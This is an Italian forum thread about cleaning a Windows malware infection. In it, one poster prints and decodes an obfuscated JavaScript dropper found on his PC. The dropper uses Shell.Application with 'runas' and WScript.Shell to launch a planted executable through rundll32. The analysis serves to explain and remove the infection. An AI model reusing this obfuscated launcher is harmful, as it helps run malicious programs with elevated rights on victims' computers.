Quote:
Originariamente inviato da orione67
Perchè stupida?... Sicuramente è la soluzione giusta per far funzionare in emergenza qualsiasi software "scaduto", non ci vuole molto per arrivarci...  |
Beh non è proprio così scontato che per bypassare il periodo di validità di un software, sia sufficiente portare indietro la data del computer.
Se fosse così le trial anche di software costosi avrebbero vita infinita ...
Quote:
Originariamente inviato da orione67
P.s. Io avevo beccato questo virus qualche settimana fa, risolto positivamente con il combofix. Ieri però ho fatto una scansione completa con l'AVG e mi ha trovato ancora qualche traccia in c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js, spostato in quarantena e poi definitivamente eliminato... Spero adesso che l'AVG riconosca questo virus prima di far nuovamente danni...  |
Anch'io avevo quel file dsgsdgdsgdsgw.js sul pc, è buono che AVG te l'abbia riconosciuto come pericoloso e te l'ha spostato in quarantena.
Nel mio caso (allora avevo MSE), l'antivirus di Microsoft non se n'era neanche accorto.
Me l'ha trovato Combofix e l'ho tolto dalla cartella documenti.
Comunque l'ho salvato e l'ho aperto con blocco note, tanto è un javascript.
E' interessante quello che c'è dentro.
Il contenuto è questo:
Codice:
var w = String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(46)+String.fromCharCode(65)+String.fromCharCode(112)+String.fromCharCode(112)+String.fromCharCode(108)+String.fromCharCode(105)+String.fromCharCode(99)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(110);
var a = String.fromCharCode(67)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(87)+String.fromCharCode(73)+String.fromCharCode(78)+String.fromCharCode(68)+String.fromCharCode(79)+String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(115)+String.fromCharCode(121)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(109)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32);
var s = String.fromCharCode(99)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(100)+String.fromCharCode(111)+String.fromCharCode(99)+String.fromCharCode(117)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(103)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(120)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(119)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(100)+String.fromCharCode(115)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(44)+String.fromCharCode(72)+String.fromCharCode(49)+String.fromCharCode(78)+String.fromCharCode(51);
var m = String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(115);
var activex = new ActiveXObject(w);
activex.ShellExecute(a,s,"",m,1);
WScript.Sleep(2000);
var r = String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108);
var WSHShell = WScript.CreateObject(r);
WSHShell.Run(a+s);
all'apparenza non si capisce una mazza, visto che compone il codice usando la codifica chr dei caratteri.
Ma incorporando il codice in una pagina html e facendo il document.write delle variabili che usa, la cosa assume un significato più chiaro e il codice diventa questo:
Codice:
var w = Shell.Application;
var a = C:\\WINDOWS\\system32\\rundll32.exe;
var s = c:\docume~1\giomax~1\wgsdgsdgdsgsd.exe ,H1N3;
var m = runas;
var activex = new ActiveXObject(w);
activex.ShellExecute(a,s,"",m,1);
WScript.Sleep(2000);
var r = WScript.Shell;
var WSHShell = WScript.CreateObject(r);
WSHShell.Run(a+s);
In pratica utilizza la shell di windows per eseguire il programma wgsdgsdgdsgsd.exe che era stato messo all'interno della cartella documenti.
Il tutto credo che venisse attivato da un collegamento presente in esecuzione automatica.
Quello l'ho proprio cancellato e non me lo sono salvato.
Quote:
Originariamente inviato da il divino
Come difese ho avira e malawarebyte
Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. .
|
Non è un buon segno se il firewall ti risulta disattivato.
magari hai ancora qualche porcata in giro.
Provato HitmanPro se ti scova qualcosa ?